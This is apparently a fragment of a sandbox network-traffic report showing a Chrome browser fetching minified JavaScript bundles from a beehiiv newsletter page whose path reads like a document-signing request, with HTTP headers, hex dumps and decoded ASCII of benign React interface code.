                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6f 6c 6f 72 3a 70 2c 70 6c 61 63 65 68 6f 6c 64 65 72 54 65 78 74 43 6f 6c 6f 72 3a 5f 2c 62 75 74 74 6f 6e 54 65 78 74 3a 77 2c 70 6c 61 63 65 68 6f 6c 64 65 72 54 65 78 74 3a 6c 2c 62 6f 72 64 65 72 45 6e 61 62 6c 65 64 3a 76 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 45 2c 65 6d 61 69 6c 49 63 6f 6e 45 6e 61 62 6c 65 64 3a 54 7d 3d 74 2c 43 3d 4d 65 28 69 2e 72 61 64 69 75 73 29 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 73 28 6f 65 2c 7b 73 74 79 6c 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 70 2c 62 6f 72 64 65 72 3a 76 3f 60 32 70 78 20 73 6f 6c 69 64 20 24 7b 45 7d 60 3a 22 6e 6f 6e 65 22 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 65 2e 6a 73 78 28 74 65 2c 7b 63 6f
                                                                                                                                            Data Ascii: olor:p,placeholderTextColor:_,buttonText:w,placeholderText:l,borderEnabled:v,borderColor:E,emailIconEnabled:T}=t,C=Me(i.radius);return e.jsxs(oe,{style:{backgroundColor:p,border:v?`2px solid ${E}`:"none"},className:"overflow-hidden",children:[e.jsx(te,{co
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 22 74 65 6d 70 6c 61 74 65 2d 33 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 29 3f 22 74 65 6d 70 6c 61 74 65 2d 31 22 3a 74 2c 56 65 3d 28 7b 73 69 67 6e 75 70 53 74 79 6c 65 73 3a 74 7d 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 57 65 28 74 3f 2e 74 65 6d 70 6c 61 74 65 29 2c 72 3d 7b 22 74 65 6d 70 6c 61 74 65 2d 31 22 3a 4c 65 2c 22 74 65 6d 70 6c 61 74 65 2d 32 22 3a 55 65 2c 22 74 65 6d 70 6c 61 74 65 2d 33 22 3a 24 65 7d 5b 6f 5d 2c 7b 69 73 53 75 62 6d 69 74 74 69 6e 67 3a 73 2c 61 75 74 6f 46 6f 63 75 73 3a 61 2c 65 6d 61 69 6c 3a 69 2c 73 65 74 45 6d 61 69 6c 3a 6d 2c 6f 6e 45 6d 61 69 6c 43 68 61 6e 67 65 3a 6e 7d 3d 46 65 28 29 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 28 72 2c 7b 73 69 67 6e 75 70 53 74 79 6c 65 73 3a 74 2c 61 75 74 6f 46 6f 63 75 73 3a 61
                                                                                                                                            Data Ascii: "template-3"].includes(t)?"template-1":t,Ve=({signupStyles:t})=>{const o=We(t?.template),r={"template-1":Le,"template-2":Ue,"template-3":$e}[o],{isSubmitting:s,autoFocus:a,email:i,setEmail:m,onEmailChange:n}=Fe();return e.jsx(r,{signupStyles:t,autoFocus:a


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            104192.168.2.1649830104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC845OUTGET /assets/disclosure-OT1gpdxK.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC913INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4640
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1220-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b6382742c3-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC456INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 62 61 63 37 66 66 62 2d 63 66 33 38 2d 35 65 35 62 2d 62 34 36 36 2d 39 38 62 65 36 30 37 36 34 61 31 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cbac7ffb-cf38-5e5b-b466-98be60764a11")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 22 2e 2f 74 72 61 6e 73 69 74 69 6f 6e 2d 79 2d 35 58 46 46 75 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 6a 7d 66 72 6f 6d 22 2e 2f 62 75 67 73 2d 44 56 51 7a 42 68 2d 73 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6f 20 61 73 20 51 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 3b 76 61 72 20 4d 3b 6c 65 74 20 56 3d 28 4d 3d 62 2e 73 74 61 72 74 54 72 61 6e 73 69 74 69 6f 6e 29 21 3d 6e 75 6c 6c 3f 4d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 29 7d 3b 76 61 72 20 59 3d 28 65 3d 3e 28 65 5b 65 2e 4f 70 65 6e 3d 30 5d 3d 22 4f 70 65 6e 22 2c 65 5b 65 2e 43 6c 6f 73 65 64 3d 31 5d 3d 22 43 6c 6f 73 65 64 22 2c 65 29 29 28 59 7c 7c 7b 7d 29 2c 5a 3d 28 65 3d 3e 28 65 5b 65 2e 54 6f 67 67 6c 65
                                                                                                                                            Data Ascii: "./transition-y-5XFFuu.js";import{r as j}from"./bugs-DVQzBh-s.js";import{o as Q}from"./use-is-mounted-BaHv16bB.js";var M;let V=(M=b.startTransition)!=null?M:function(e){e()};var Y=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Y||{}),Z=(e=>(e[e.Toggle
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6c 29 3b 4f 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 44 69 73 63 6c 6f 73 75 72 65 50 61 6e 65 6c 43 6f 6e 74 65 78 74 22 3b 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 6e 2e 75 73 65 43 6f 6e 74 65 78 74 28 4f 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 24 28 74 2e 74 79 70 65 2c 5f 2c 65 2c 74 29 7d 6c 65 74 20 47 3d 6e 2e 46 72 61 67 6d 65 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 65 2c 74 29 7b 6c 65 74 7b 64 65 66 61 75 6c 74 4f 70 65 6e 3a 73 3d 21 31 2c 2e 2e 2e 69 7d 3d 65 2c 6d 3d 6e 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 6c 3d 54 28 74 2c 41 28 75 3d 3e 7b 6d 2e 63 75 72 72 65 6e 74 3d 75 7d 2c 65 2e 61 73 3d 3d 3d 76 6f 69 64 20 30 7c 7c 65 2e 61 73 3d 3d 3d 6e 2e 46 72 61 67 6d 65 6e 74 29 29
                                                                                                                                            Data Ascii: l);O.displayName="DisclosurePanelContext";function q(){return n.useContext(O)}function z(e,t){return $(t.type,_,e,t)}let G=n.Fragment;function J(e,t){let{defaultOpen:s=!1,...i}=e,m=n.useRef(null),l=T(t,A(u=>{m.current=u},e.as===void 0||e.as===n.Fragment))
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 7c 7c 44 2e 66 6f 63 75 73 28 29 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 73 77 69 74 63 68 28 6f 2e 6b 65 79 29 7b 63 61 73 65 20 6b 2e 53 70 61 63 65 3a 63 61 73 65 20 6b 2e 45 6e 74 65 72 3a 6f 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6f 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 72 28 7b 74 79 70 65 3a 30 7d 29 3b 62 72 65 61 6b 7d 7d 29 2c 49 3d 67 28 6f 3d 3e 7b 73 77 69 74 63 68 28 6f 2e 6b 65 79 29 7b 63 61 73 65 20 6b 2e 53 70 61 63 65 3a 6f 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 62 72 65 61 6b 7d 7d 29 2c 50 3d 67 28 6f 3d 3e 7b 76 61 72 20 44 3b 6a 28 6f 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 7c 7c 65 2e 64 69 73 61 62 6c 65 64 7c 7c 28 61 3f 28 72 28 7b 74 79
                                                                                                                                            Data Ascii: urrent)==null||D.focus();break}}else switch(o.key){case k.Space:case k.Enter:o.preventDefault(),o.stopPropagation(),r({type:0});break}}),I=g(o=>{switch(o.key){case k.Space:o.preventDefault();break}}),P=g(o=>{var D;j(o.currentTarget)||e.disabled||(a?(r({ty
                                                                                                                                            2025-01-15 18:14:37 UTC77INData Raw: 64 69 73 63 6c 6f 73 75 72 65 2d 4f 54 31 67 70 64 78 4b 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 63 62 61 63 37 66 66 62 2d 63 66 33 38 2d 35 65 35 62 2d 62 34 36 36 2d 39 38 62 65 36 30 37 36 34 61 31 31 0a
                                                                                                                                            Data Ascii: disclosure-OT1gpdxK.js.map//# debugId=cbac7ffb-cf38-5e5b-b466-98be60764a11


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            105192.168.2.1649831104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC847OUTGET /assets/SparklesIcon-DA4hsc2a.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1710
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"6ae-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b69d33f791-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 35 31 38 37 30 65 62 2d 32 65 32 64 2d 35 62 66 31 2d 61 66 66 33 2d 33 34 61 66 32 33 39 31 35 63 36 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c51870eb-2e2d-5bf1-aff3-34af23915c6e")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1253INData Raw: 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 74 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 65 7d 2c 72 29 2c 61 3f 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 65 7d 2c 61 29 3a 6e 75 6c 6c 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 39 20 34 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 37 32 31 2e 35 34 34 6c 2e 38 31 33 20 32 2e 38 34 36 61 33 2e 37 35 20 33 2e 37 35 20 30 20 30 20 30 20 32 2e 35 37 36 20 32 2e 35 37 36 6c 32 2e 38 34 36 2e 38 31 33 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 30 20
                                                                                                                                            Data Ascii: lor","aria-hidden":"true","data-slot":"icon",ref:t,"aria-labelledby":e},r),a?l.createElement("title",{id:e},a):null,l.createElement("path",{fillRule:"evenodd",d:"M9 4.5a.75.75 0 0 1 .721.544l.813 2.846a3.75 3.75 0 0 0 2.576 2.576l2.846.813a.75.75 0 0 1 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            106192.168.2.1649833104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC569OUTGET /assets/useSetLastViewedResource-BelRoKi6.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 9331
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2473-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b7490243e6-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC467INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 37 32 38 62 30 31 36 2d 36 30 34 64 2d 35 62 30 62 2d 39 33 61 61 2d 35 33 34 31 34 31 61 62 64 34 66 61 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5728b016-604d-5b0b-93aa-534141abd4fa")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 72 6f 6d 22 2e 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 4c 2c 4c 20 61 73 20 77 2c 75 20 61 73 20 6a 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4c 20 61 73 20 54 7d 66 72 6f 6d 22 2e 2f 4c 6f 67 69 6e 57 69 74 68 50 61 73 73 77 6f 72 64 41 63 74 69 6f 6e 2d 54 56 4c 70 4a 61 4c 71 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 54 20 61 73 20 66 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 42 64 70 41 50 70 64 4e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 49 20 61 73 20 4d 7d 66 72 6f 6d 22 2e 2f
                                                                                                                                            Data Ascii: rom"./useToast-DK42uF07.js";import{c as L,L as w,u as j}from"./components-Oj2xMfGE.js";import{u as b}from"./useTranslation-CfKJAmGY.js";import{L as T}from"./LoginWithPasswordAction-TVLpJaLq.js";import{T as f}from"./index-BdpAPpdN.js";import{I as M}from"./
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 4e 61 6d 65 3a 22 62 6c 6f 63 6b 20 77 2d 66 75 6c 6c 20 66 6c 65 78 2d 5b 32 5d 20 62 6f 72 64 65 72 2d 6e 6f 6e 65 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 6c 67 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 74 65 78 74 2d 62 6c 61 63 6b 20 70 6c 61 63 65 68 6f 6c 64 65 72 3a 74 65 78 74 2d 6c 67 20 66 6f 63 75 73 3a 74 65 78 74 2d 6c 67 20 66 6f 63 75 73 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 22 2c 72 65 71 75 69 72 65 64 3a 21 30 7d 29 2c 65 2e 6a 73 78 28 22 62 75 74 74 6f 6e 22 2c 7b 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 6f 6e 43 6c 69 63 6b 3a 75 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 77 74 2d 62 75 74 74 6f 6e 2d 66 6f 6e 74 20 62 6c 6f 63 6b 20 68 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 66 6c 65 78 2d 5b 31 5d 20 63 75 72 73 6f 72
                                                                                                                                            Data Ascii: Name:"block w-full flex-[2] border-none bg-transparent text-lg font-normal text-black placeholder:text-lg focus:text-lg focus:outline-none",required:!0}),e.jsx("button",{type:"button",onClick:u,className:"wt-button-font block h-full w-full flex-[1] cursor
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 2d 2e 38 37 32 6c 2d 33 2e 32 33 36 20 34 2e 35 33 4c 39 2e 35 33 20 31 32 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 20 30 2d 31 2e 30 36 20 31 2e 30 36 6c 32 2e 32 35 20 32 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 20 30 20 31 2e 31 34 2d 2e 30 39 34 6c 33 2e 37 35 2d 35 2e 32 35 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 7d 29 29 7d 63 6f 6e 73 74 20 4b 3d 64 2e 66 6f 72 77 61 72 64 52 65 66 28 43 29 2c 52 3d 28 7b 69 73 4f 70 65 6e 3a 73 2c 6f 6e 43 6c 6f 73 65 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 61 2c 74 69 74 6c 65 3a 74 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 6e 2c 70 75 62 6c 69 63 61 74 69 6f 6e 3a 6f 2c 61 6c 74 65 72 6e 61 74 69 76 65 41 63 74 69 6f 6e 3a 6d 7d 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 21 21 6f 3f 2e 68 61 73 5f 73
                                                                                                                                            Data Ascii: -.872l-3.236 4.53L9.53 12.22a.75.75 0 0 0-1.06 1.06l2.25 2.25a.75.75 0 0 0 1.14-.094l3.75-5.25Z",clipRule:"evenodd"}))}const K=d.forwardRef(C),R=({isOpen:s,onClose:r,children:a,title:t,description:n,publication:o,alternativeAction:m})=>{const i=!!o?.has_s
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 61 62 73 6f 6c 75 74 65 20 72 69 67 68 74 2d 36 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 22 62 75 74 74 6f 6e 22 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 43 6c 6f 73 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 68 2d 36 20 77 2d 36 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 2d 77 74 20 74 72 61 6e 73 69 74 69 6f 6e 2d 61 6c 6c 20 68 6f 76 65 72 3a 62 67 2d 62 6c 61 63 6b 2f 35 22 2c 6f 6e 43 6c 69 63 6b 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 76 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 68 2d 35 20 77 2d 35 20 73 74 72 6f 6b 65 2d 31 20 74 65 78 74 2d 67 72 61 79 2d 34 30 30 20 74 72 61 6e
                                                                                                                                            Data Ascii: sx("div",{className:"absolute right-6",children:e.jsx("button",{"aria-label":"Close",className:"flex h-6 w-6 items-center justify-center rounded-wt transition-all hover:bg-black/5",onClick:r,children:e.jsx(v,{className:"h-5 w-5 stroke-1 text-gray-400 tran
